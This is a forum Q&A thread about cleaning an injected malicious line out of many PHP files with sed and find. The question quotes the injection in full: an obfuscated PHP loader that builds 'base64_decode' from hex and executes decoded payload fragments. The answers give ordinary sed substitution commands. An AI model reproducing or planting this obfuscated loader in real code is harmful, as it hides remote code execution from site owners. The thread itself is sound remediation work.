# Bash insert string after deleting line with sed

Tags: linux, string, bash, sed

I want to remove these line because it's a injection code:

```
if (!function_exists('openNewOFormatCall')){function openNewOFormatCall($a, $b){$c=$GLOBALS[' '];$d=pack('H*','6261736536345f64'.'65636f6465'); return $d(substr($c, $a, $b));};$useGitFallYCutCodeU=openNewOFormatCall(3851,20);$useGitFallYCutCodeU("", openNewOFormatCall(3873, 3).openNewOFormatCall(565,3283).openNewOFormatCall(3879, 3));};?><?php
```

I can certainly remove that line with syntax:

```
find -iname "*.php" -exec sed -i '/openNewOFormatCall/d' {} \;
```

The problem is, it would also delete that attaching character at the end `<?php` which was required for the php files to work correctly. So i was thinking to delete this line and adding new `<?php` afterwards.

please advise.

Comment: I suggest to take a look at sed's `s` command.

Comment: Also please do always add your sample input and sample output in your posts too so that we could help you more on same.

Comment: sampe is too big because the injection line is very long, i think what i want to achive is clear enough to make <?php on the last line intact

Answer (score 2):

Just use:

```
sed 's/.*openNewOFormatCall.*/<?php/' file
```

If the part behind ?> is variable:

```
sed -r 's/..*openNewOFormatCall.*\?>(.*)/\1/' file
```

The question mark needs masking. (.*) captures what follows ?>. \1 is the backreference to the captured content.

If it works, and after making a backup of valuable data, you will run it with `-i` for modifications in place like in your example:

```
find -iname "*.php" -exec sed -i -r 's/..*openNewOFormatCall.*\?>(.*)/\1/' {} \;
```

Comment: i don't understand, that sed syntax only printout the file contents?

Comment: Yes. You will first look, if the program behaves like you've planned. Updated the answer.